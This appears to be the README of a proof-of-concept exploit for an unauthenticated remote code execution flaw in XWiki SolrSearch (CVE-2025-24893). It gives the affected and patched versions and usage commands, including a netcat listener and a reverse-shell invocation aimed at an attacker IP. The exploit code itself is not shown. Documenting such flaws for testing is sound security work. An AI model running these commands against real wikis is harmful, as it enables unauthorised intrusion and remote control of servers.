
PoC de RCE não autenticado para XWiki SolrSearch (CVE-2025-24893). Execução de comandos + shell reverso.
PoC de RCE não autenticada para XWiki SolrSearch (CVE-2025-24893). Execução de comandos + shell reversa.
Prova de conceito para a injeção de template SolrSearch do XWiki que leva à execução remota de código não autenticada.
Testado contra XWiki Debian 15.10.8 (corrigido nas versões 15.10.11 / 16.4.1 / 16.5.0RC1).
⚠️ Apenas para uso educacional. Não execute isto contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.
/xwiki/bin/get/Main/SolrSearch.pip install requests
Especifique o host alvo (e o caminho opcional) ao executar o script.
Execute comandos básicos:
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"
Inicie uma shell reversa:
# On attacker box
nc -lvnp 4444
# From the PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444
/xwiki/bin/get/Main/SolrSearch?media=rss&text=...